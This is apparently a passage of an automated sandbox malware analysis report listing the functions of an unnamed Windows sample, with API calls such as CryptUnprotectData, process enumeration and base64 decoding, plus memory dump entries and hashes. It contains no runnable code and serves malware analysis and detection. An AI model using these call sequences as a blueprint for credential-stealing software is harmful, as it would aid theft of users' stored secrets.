                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D18C1
                                  • Part of subcall function 009D1820: lstrlen.KERNEL32(009E4FA0), ref: 009D18D3
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D18F4
                                  • Part of subcall function 009D1820: lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D1900
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D192F
                                • sscanf.NTDLL ref: 009D1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D1BC6
                                • ExitProcess.KERNEL32 ref: 009D1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 8a807279d6b66faf445be96eadaae6ab53de2eaba4f03c2e0912339453819247
                                • Instruction ID: f2ed2c3f76b621d9b5bf10ec7e1869401e247d907686da8704938afca2b763d1
                                • Opcode Fuzzy Hash: 8a807279d6b66faf445be96eadaae6ab53de2eaba4f03c2e0912339453819247
                                • Instruction Fuzzy Hash: EA21F3B1518341AF8350DF69D88495FBBF9FFC8214F408A1EF599C7220EB30D5088BA2
                                Function 009B7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009B775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009B778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009B77AD
                                • LocalFree.KERNEL32(?), ref: 009B77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 641c692a26ebb583f5b7670e99aa98b6abf4f00b3522b755ec7f7ea4a5fe535f
                                • Instruction ID: cbe67745fe5ea660289c7e12e5e9863a91fc69c790aa5cee4992824c244f01cd
                                • Opcode Fuzzy Hash: 641c692a26ebb583f5b7670e99aa98b6abf4f00b3522b755ec7f7ea4a5fe535f
                                • Instruction Fuzzy Hash: F7011E75B40308BBEB10DBA49C4AFEA7B7CEB44B11F104155FA09EB2C0DAB0A904CB90
                                Function 009D3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D3ABF
                                  • Part of subcall function 009D7310: lstrlen.KERNEL32(------,009B5BEB), ref: 009D731B
                                  • Part of subcall function 009D7310: lstrcpy.KERNEL32(00000000), ref: 009D733F
                                  • Part of subcall function 009D7310: lstrcat.KERNEL32(?,------), ref: 009D7349
                                  • Part of subcall function 009D7280: lstrcpy.KERNEL32(00000000), ref: 009D72AE
                                • CloseHandle.KERNEL32(00000000), ref: 009D3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 16c8caf0c877153e556c688776aa8e884ffa831c0268bf393dccdd1546e75c51
                                • Instruction ID: 0cc99ee6bff78aaa88b1c09d20e853ac63d3af06321fe2b86c0ea74f1dd9cf40
                                • Opcode Fuzzy Hash: 16c8caf0c877153e556c688776aa8e884ffa831c0268bf393dccdd1546e75c51
                                • Instruction Fuzzy Hash: 48810830941204DFC714CF19D888BA5B7F5FB44316F29C1AAD808AB3A2D77A9D86CF81
                                Function 009BEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 009BEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 009BEA7E
                                • lstrcat.KERNEL32(009DCFEC,009DCFEC), ref: 009BEB27
                                • lstrcat.KERNEL32(009DCFEC,009DCFEC), ref: 009BEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 818d492f299401924742286729f33626b1ee780c3833c6f4d40e2c9a15eec5a8
                                • Instruction ID: e621472f314f9c03a038a70e327fe7b2b3464392ab4319f7deb907576939eeac
                                • Opcode Fuzzy Hash: 818d492f299401924742286729f33626b1ee780c3833c6f4d40e2c9a15eec5a8
                                • Instruction Fuzzy Hash: 6531D375A40219ABDB109B58EC85FEFB77DDF84715F0081AAFA09E7241DBB05A04CBA1
                                Function 009D40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009D40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009D40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009D4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: a85a70cc1d20f7562c27b34ea9d2463b4e3833029436d4ef7769f23aeb242fe4
                                • Instruction ID: c720c6a5f2dab92c1434fdb4a61e2c442b5bf40ea626bd8f7ef0c1f865af484d
                                • Opcode Fuzzy Hash: a85a70cc1d20f7562c27b34ea9d2463b4e3833029436d4ef7769f23aeb242fe4
                                • Instruction Fuzzy Hash: B1012C70600205BBDB10DFA5DC89BAABBADEF85311F108159FE09C7340DE71D940DBA4
                                Function 009B9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009B9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009B9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009B9B61
                                • LocalFree.KERNEL32 ref: 009B9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 1fcfe06732bbdce707171fcd1ee45df848ebf85a18af51fa241c205e069ab1e0
                                • Instruction ID: 1661676922a331de03b7a2a551b843f670d92a29657e95c74bc46f59762c9a65
                                • Opcode Fuzzy Hash: 1fcfe06732bbdce707171fcd1ee45df848ebf85a18af51fa241c205e069ab1e0
                                • Instruction Fuzzy Hash: 3DF01DB03503226BE7305F64AC89F967BACEF04B61F200114FA45EE2D1DBB49844CAA4
                                Function 00D71A0D Relevance: 5.9, Strings: 4, Instructions: 894COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #~$c?W|$z;$_\
                                • API String ID: 0-2423325474
                                • Opcode ID: 8a9d927321d0e4b460835320666b113274561f59ffeed9827c6a6a492ebe4499
                                • Instruction ID: 43348a2e0ac06056291f891a5d4723e9f85a78d0cd958bb65a096680dc44c817
                                • Opcode Fuzzy Hash: 8a9d927321d0e4b460835320666b113274561f59ffeed9827c6a6a492ebe4499
                                • Instruction Fuzzy Hash: BC42F6F3A08204AFE3046E2DEC4677AFBE9EF94720F1A453DE6C5C3744EA3558058696
                                Function 00D72C02 Relevance: 5.4, Strings: 3, Instructions: 1612COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9\W~$svZ$3r}
                                • API String ID: 0-4160629106
                                • Opcode ID: d4b75b1c6dff6e9d6bf88f9ead2d367b695aa074b44fbf5b410fe65bf4bbb13e
                                • Instruction ID: 660d8983ee3ecaa477244a6af5fc719f34f26ab319d3719cb0fbf463922ded53
                                • Opcode Fuzzy Hash: d4b75b1c6dff6e9d6bf88f9ead2d367b695aa074b44fbf5b410fe65bf4bbb13e
                                • Instruction Fuzzy Hash: 31B2F8F3A0C2049FE304AE2DEC8566ABBE5EF94720F168A3DEAC4C7744E53558058797
                                Function 00D62351 Relevance: 5.4, Strings: 3, Instructions: 1604COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @`ey$\ji$G<y
                                • API String ID: 0-737609126
                                • Opcode ID: 04c84a375f2de46cca5bb84111e24cac4710ae89ad05322f7b1125b77cfe9000
                                • Instruction ID: 568a4f1d2f78ed0776055794213ffb668c378dc44bffbbf45ac55ff0d70911a8
                                • Opcode Fuzzy Hash: 04c84a375f2de46cca5bb84111e24cac4710ae89ad05322f7b1125b77cfe9000
                                • Instruction Fuzzy Hash: F7B22BF36082049FE704AE2DEC8567AFBEAEFD4720F16863DE6C4C7744E53598058692
                                Function 00D6C1FE Relevance: 5.3, Strings: 3, Instructions: 1574COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: `Rz>$kUoh$pp_y
                                • API String ID: 0-2210087962
                                • Opcode ID: 47679efe64abce4f451a6485401dfc6ca86a524961d7a3b158ea4eb21af1cfff
                                • Instruction ID: 58b74c15aadc2b96a2356818baa9e33c415e470d8ce70dd7adeb9edfab6f03fe
                                • Opcode Fuzzy Hash: 47679efe64abce4f451a6485401dfc6ca86a524961d7a3b158ea4eb21af1cfff
